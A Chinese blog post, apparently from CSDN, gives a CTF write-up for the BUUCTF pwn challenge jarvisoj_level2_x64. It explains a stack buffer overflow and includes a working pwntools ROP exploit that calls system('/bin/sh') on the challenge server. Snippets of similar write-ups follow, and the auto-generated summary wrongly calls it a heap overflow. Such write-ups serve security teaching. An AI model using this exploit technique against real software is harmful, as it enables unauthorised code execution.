buuctf|pwn-jarvisoj_level2_x64-wp

最新推荐文章于 2024-07-05 00:58:41 发布
最新推荐文章于 2024-07-05 00:58:41 发布
阅读量448 收藏
点赞数
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/121216928
版权
本文详细描述了一次针对64位程序的堆溢出攻击,通过IDA工具定位关键字符串和地址,着重解析了利用buf溢出调用/bin/sh并找到system函数的过程。最终通过payload实现了权限提升,展示了从堆保护到exploit的完整步骤。
摘要由CSDN通过智能技术生成

1.例行检查保护机制

只开启了堆保护

2.我们用64位的IDA查看该文件 

shift+f12查看关键字符串,我们看到关键字符串“/bin/sh”

 

我们双击“/bin/sh”,bin/sh的地址为:0x0600A90

 

3.查看main函数里面的内容

 进入vulnerable_function()函数

 我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出

4.system("/bin/sh")才能拿到权限

我们找到了“/bin/sh”

所以我们现在来找system

双击_system

 

我们发现system在plt里面,system地址为:0x04004C0

5.EXP

#encoding = utf-8
from pwn import * 

context(os = 'linux', arch = 'amd64',log_level = 'debug')
content = 0

def main():
	if content == 1:
		p = process('level2_x64')
	else:
		p = remote('node4.buuoj.cn',25149)
		
	#.data:0000000000600A90 hint            db '/bin/sh',0
	bin_addr     = 0x0600A90
	#.plt:00000000004004C0 _system 
	system_addr  = 0x04004C0
	#0x00000000004006b3 : pop rdi ; ret
	pop_rdi_addr = 0x04006b3
	
	payload = b'a' * (0x80+0x8) + p64(pop_rdi_addr) + p64(bin_addr) + p64(system_addr)
	p.recvuntil("Input:")
	p.sendline(payload)
	p.interactive()
main()

 

 

 

L__y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1411
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
[BUUCTF]PWN——jarvisoj_level2_x64
BangSen1的博客
03-30 1346
jarvisoj_level2_x64 例行检查 ,64位,开启NX保护, 运行一下 用IDA打开。 systemaddr=0x40063e shalladdr=0x400A90 查看主函数,buf的长度为0x80,读取的长度为0x200,可以造成溢出漏洞。 rdiaddr= 0x4006b3 from pwn import * context(log_level = 'debug') elf = ELF('./level2_x64') p = remote('node3.buuoj.cn',
BUUCTF-PWN】13-jarvisoj_level2_x64
最新发布
燕麦葡萄干的博客
07-05 384
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
[BUUCTF-pwn]——jarvisoj_level2_x64
Y_peak的博客
02-11 349
[BUUCTF-pwn]——jarvisoj_level2_x64 题目地址:https://buuoj.cn/challenges#jarvisoj_level2_x64 checksec 一下,64位 ,开启NX保护 64位应该会用到pop rdi这个汇编指令 在IDA中看看 思路:64位先将binsh这个参数放入,rdi寄存器中.紧接着返回并执行system函数 exploit from pwn import * p = remote("node3.buuoj.cn",27828) b
BUUCTF pwn——jarvisoj_level2_x64
CNS-Enterprise BCC-1701-J
04-03 251
BUUCTF 做题练习
jarvisoj_level2_x64[BUUCTF]
moonlightsunshin的博客
05-04 337
32位中参数都是保存在栈上,但在64位中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成 无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道题 64位会依次传函数返回地址,函数参数,函数调用地址,
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
BUUCTF jarvisoj_level2_x64
小白垃圾笔记2
05-12 291
因为有栈对齐所以需要ret,因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做题笔记,不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。
jarvisoj_level2_x64
zip471642048的博客
06-24 572
题目地址 : https://buuoj.cn/challenges#jarvisoj_level2_x64 /bin/sh字符串 exp
buuctf jarvisoj_level2_x64
carol2358的博客
04-22 393
水题 栈溢出,system和binsh都可以用gdb找到 exp: from pwn import * from LibcSearcher import * local_file = './level2_x64' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.so.6' s...
BUUCTFjarvisoj_level2_x64 Write Up
古月浪子的博客
08-06 623
漏洞函数里面可以看到,我们可以栈溢出 题目使用了system函数,我们可以直接调用 程序里面藏了一个binsh 接下来只需要构造rop链了 64位的函数调用的第一个参数由rdi寄存器传递,很显然需要用到pop rdi这个gadget,并且几乎每个64位程序里面都能找到它 再需要注意的就是,system调用的时候需要栈对齐,这里采用一个ret来对齐栈 from pwn import * from LibcSearcher import * from struct import pack context..
PWN_JarvisOJ_Level2_x64
michaelinfinity的博客
03-16 1426
关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。 32位的函数在调用栈的时候是: 调用函数地址->函数的返回地址->参数n->参数n-1....->参数1 64位的函数在调用栈的时候是: 前六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。 ...
buuctf pwn
10-01
buuctf pwn是指一个CTF比赛中的pwn题目,其中包含了经典的栈溢出漏洞、ret2system和ret2text的漏洞利用方法。在栈溢出漏洞中,通过向缓冲区中输入超过其容量的数据,覆盖掉程序的返回地址,从而控制程序的执行流程。而ret2system是一种漏洞利用技术,通过修改返回地址为system函数的地址,来实现执行系统命令的目的。ret2text是一种类似的漏洞利用技术,通过修改返回地址为.text段中的某个特定地址,来实现执行指定代码的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值